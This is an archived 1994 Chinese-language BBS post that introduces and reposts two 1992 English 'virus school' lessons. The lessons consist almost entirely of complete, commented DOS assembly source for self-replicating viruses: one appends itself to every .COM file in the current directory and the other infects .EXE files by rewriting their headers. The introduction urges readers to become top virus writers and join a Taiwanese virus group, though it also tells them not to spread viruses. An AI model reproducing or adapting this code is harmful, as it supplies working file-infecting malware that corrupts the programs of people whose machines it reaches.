Hitech 的話:

在你開始嘗試驚奇的電腦病毒創作以前,你應該對組合語言已有基本的認識,如果你
完全不會組合語言,先去找本80x86或680x0(如果你想玩Macintosh病毒的話)組合語言
的書來研讀,等你有一定的基礎了,再回過頭來學習電腦病毒的技術(包含寫毒、解毒、
和防毒原理);如果你已具備這些條件,我個人再要求你開始對C(或C++)語言、Windows
程式設計(包含 Microsoft Windows 和 Unix 下的 X-Window)、和 Unix 作業系統下
功夫,這是目前病毒界的大趨勢,如果你想成為未來世界上頂尖的病毒高手,聽我的話
絕不會錯的。

如果你沒機會使用網路上的工作站電腦,現在開始把你的PC擴增到至少 8M 的 RAM,
300M 以上的硬碟,486 DX 以上的主機板,然後想辦法去得到免費的 Linux和X-Free86
來安裝,開始把Unix玩弄於股掌之間吧!!

在開始研究病毒以前,首先,你得擁有一本詳細的 PC Interrupt 手冊以供隨時查閱
;如果你沒錢買的話,你可以到 Internet 上 的 FTP 站 nctuccca.edu.tw//pub/PC/
simtel/info 下 或 NeXT BBS 抓 inter41a.zip、inter41b.zip、和 inter41c.zip 這
三個檔案,這份由 Ralf Brown 編的電子版技術文件資料相當詳盡。

以下兩篇由 Tormentor 所寫的教學病毒程式相當簡易,可當做那些想一窺病毒堂奧
卻不得其門而入的初學者一理想的教材,好好加油吧,希望有一天你自己能寫出一隻很
棒的病毒或防毒程式,如果你還能在電腦病毒上模擬出生物病毒的行為(比如說性狀轉
變(transformation) 的發生),我跟你說,你可以發表論文了!:-)

有一點我要你嚴格遵守,絕對不可以放毒去害人,寫毒本身沒有罪,但是到處散播病
毒就不應該了,你可以把你的作品放到 NeXT BBS (TEL:(02)305-7135、(02)301-9620)
與所有的病毒玩家分享,或是把它設計成鎖在 Virtual Computer (虛擬電腦)之中。請
謹記我的話,否則你將與世界上各大病毒組織為敵。

好好努力吧,期待有一天你成為台灣病毒組織中的一名大將!!


 Hitech Pro // I.C.G 於 1994.7.25

Internet: rfchen@ccms.ntu.edu.tw
90郵網: 孟水劍 (NeXT ID: hitech pro)

======================================
【2】病毒小學 ─ 課程(一) 啟智教育

發信人: hitech@pro (Hitech Pro), 信區: virus
標 題: 病毒小學 ─ 課程(一) 啟智教育
發信站: Intellectual Creativity Group (Wed Jul 27 20:00:00 1994)
轉信站: phoenix!bbsroute!news.csie.nctu!netnews.ntu!pro!hitech


;
; Virus school, lesson 1 (c) 1992 Tormentor [Demoralized Youth]
;
; This is the first lesson on how to make your own virus.
; Hope you'll learn something of it...
; To be compiled with TASM 3.0 or higher.
;
; This virus is quite dumb and 'noisy'
; It updates the filedate and time, changes DTA before execution causing
; some progs to believe they are executed with parameters...
; But this should only be a 'raw' virus that you can develop.
; Certain program may hang, so i recommend you not to spread to geeks
; since there is MANY better viruses to use for such nice purpose.
;
; If you want to contact me or other virus-writers call me on my board:
; Swedish Virus Laboratory +46-3191-9393
;
; Greetings to All virus-writers!
;


.model tiny
.radix 16
.code

Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.

org 100

dummy_code: db 'M' ; Mark file as infected.
db 3 DUP(90) ; This is to simulate a infected prog.
; Not included in virus-code.

Virus_Start: call where_we_are ; Now we call the next bytes, just to
; know what address virus lies on.
where_we_are: pop si ; Since the virus-code's address will
; differ from victim to victim.
; a POP SI after a call will give us
the
; address which equals to
'where_we_are'
; Very important.

;-----------------------------------------------------------------------
; Now we have to put back the original 4 bytes in the host program, so
; we can return control to it later:

add si,_4first_bytes-where_we_are
mov di,100
cld
movsw
movsw

;------------------------------------------------------------------------

; We have to use SI as a reference since files differ in size thus making
; virus to be located at different addresses.

sub si,_4first_bytes-Virus_Start+4

;------------------------------------------------------------------------
; Now we just have to find victims, we will look for ALL .COM files in
; the current directory.

mov ah,4e ; We start to look for a *.COM file
look4victim: mov dx,offset file_match-Virus_Start
add dx,si
int 21

jc no_victim_found ; If no *.COM files was found.

mov ax,3d02 ; Now we open the file.
mov dx,9e ; The found victims name is at ds:009e
int 21 ; in DTA.

jc cant_open_file ; If file couldn't be open.

xchg ax,bx ; Save filehandle in bx
; (we could use MOV BX,AX but we saves one byte by using xchg )

mov ah,3f ; Now we read the first 4 bytes
mov cx,4 ; from the victim -> buffer

mov dx,offset _4first_bytes-Virus_Start
add dx,si
; We will then overwrite them with
int 21 ; a JMP XXXX to virus-code at end.

jc read_error

cmp byte ptr ds:[si+_4first_bytes-Virus_Start],'M'
jz sick_or_EXE ; Check if infected OR *.EXE
; Almost all EXE files starts with 'M' and we mark the infected files by
; starting with 'M' which equals to DEC BP
; Now we just have to have one check instead of 2 (infected and *.EXE)

mov ax,4202 ; Position file-pointer to point at
xor cx,cx ; End-of-File.
xor dx,dx ; Any writing to file will now APPEND
it
int 21 ; Returns AX -> at end.

sub ax,4 ; Just for the JMP structure.

mov word ptr ds:[_4new_bytes+2],ax
; Build new JMP XXXX to virus.
; ( logic: JMP AX )

mov ah,40 ; Append file with virus code.
mov cx,offset Virus_Lenght
; File-size will increase with
mov dx,si ; Virus_Lenght.
int 21

jc write_error

mov ax,4200 ; Position file-pointer to begin of
file
xor cx,cx ; So we can change the first 3 bytes
xor dx,dx ; to JMP to virus.
int 21

mov ah,40 ; Write new 3 bytes.
mov cx,4 ; After this, executing the file will
mov dx,offset _4new_bytes-Virus_Start
add dx,si
; result in virus-code executing
before
int 21 ; original code.
; (And more files will be infected)

jc write_error

mov ah,3e ; Close file, now file is infected.
int 21 ; Dos function 3E (close handle)

Sick_or_EXE: mov ah,4f ; Well, file is infected. Now let's
jmp look4victim ; find another victim...

write_error: ; Here you can test whats went wrong.
read_error: ; This is just for debugging purpose.
cant_open_file: ; These entries are equal to eachother
no_victim_found: ; but could be changed if you need to test something.

mov ax,100 ; Every thing is put back in memory,
push ax ; lets us RET back to start of program
ret ; and execute the original program.

notes db ' (c) 1992 Tormentor ,Swedish Virus Laboratory'
db ' / Demoralized Youth / '

file_match db '*.COM',0 ; Pattern to search for.
; Don't forget to end with 0 !

_4first_bytes: ret ; Here we save the 4 first org. bytes
db 3 DUP(0)
; We have a ret here since this file isn't a REAL infection.

_4new_bytes db 'M',0E9, 00, 00 ; Here we build the 4 new org. bytes
; so our virus-code will be run first.
Virus_End EQU $

end dummy_code


=======================================
【3】病毒小學 ─ 課程(二) 改造教育

發信人: hitech@pro (Hitech Pro), 信區: virus
標 題: 病毒小學 ─ 課程(二) 改造教育
發信站: Intellectual Creativity Group (Wed Jul 27 20:00:00 1994)
轉信站: phoenix!bbsroute!news.csie.nctu!netnews.ntu!pro!hitech


;
; Virus Lesson #2 'How to make a non-resident EXE infector'
;
; (c) 1992 Tormentor // Demoralized Youth
;
; Well, I had not time to comment this code as much as I wanted to,
; but here you are.
; What can be hard to understand is the .EXE header changes, but if
; you look at the description on the header (ex: Norton guide Tech. Ref)
; you'll understand...
; Anyway, feel free to use this example and if you have any questions
; or anything call my board: Swedish Virus Laboratory +46-3191-9393
;
; Greetings to all virus-writers!
;
; /Tormentor
;



.model tiny
.radix 16
.code

Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.

org 100

Virus_Start: call where_we_are

where_we_are: pop si

sub si,where_we_are-Virus_Start

mov ax,es
add ax,10
add ax,cs:[si+Exe_header-Virus_Start+16]
push ax
push cs:[si+Exe_header-Virus_Start+14]

push ds
push cs
pop ds

mov ah,1a
mov dx,offset Own_dta-Virus_Start
add dx,si
int 21

mov ah,4e ; We start to look for a *.EXE file
look4victim: mov dx,offset file_match-Virus_Start
add dx,si
int 21

jnc cont2
jmp no_victim_found ; If no *.EXE files was found.

cont2: mov ax,3d02
mov dx,Own_dta-Virus_Start+1e
add dx,si
int 21

jnc cont1
jmp cant_open_file

cont1: xchg ax,bx

mov ah,3f
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21

jc read_error

cmp byte ptr ds:[si+Exe_header-Virus_Start],'M'
jnz no_exe ; !!! Some EXEs starts with ZM !!!
cmp word ptr ds:[si+Exe_header-Virus_Start+12],'DY'
jz infected

mov ax,4202 ; Go EOF
xor cx,cx
xor dx,dx
int 21

push dx
push ax

mov ah,40 ; Write virus to EOF.
mov cx,Virus_Lenght
mov dx,si
int 21

mov ax,4202 ; Get NEW filelenght.
xor cx,cx
xor dx,dx
int 21

mov cx,200
div cx
inc ax
mov word ptr ds:[Exe_header-Virus_Start+2+si],dx
mov word ptr ds:[Exe_header-Virus_Start+4+si],ax

pop ax
pop dx

mov cx,10
div cx
sub ax,word ptr ds:[Exe_header-Virus_Start+8+si]
mov word ptr ds:[Exe_header-Virus_Start+16+si],ax
mov word ptr ds:[Exe_header-Virus_Start+14+si],dx

mov word ptr ds:[Exe_header-Virus_Start+12+si],'DY'

mov ax,4200 ; Position file-pointer to begin of
file
xor cx,cx
xor dx,dx
int 21

mov ah,40 ; Write header
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21

jc write_error

no_exe:
infected:
mov ah,3e
int 21

Sick_or_EXE: mov ah,4f
jmp look4victim

write_error: ; Here you can test whats went wrong.
read_error: ; This is just for debugging purpose.
cant_open_file: ; These entries are equal to eachother
no_victim_found: ; but could be changed if you need to test something.

pop ds
retf

file_match db '*.EXE',0 ; Pattern to search for.
; Don't forget to end with 0 !

Exe_header db 16 DUP(0)
dw 0fff0 ; Adjustment just for this COM-file.
db 4 DUP(0)

notes db '(c) 1992 Tormentor / Demoralized Youth ',0a,0d
db 'Rather first in hell, than second in heaven.'

Own_Dta db 02bh DUP(0)

Virus_End EQU $

end Virus_Start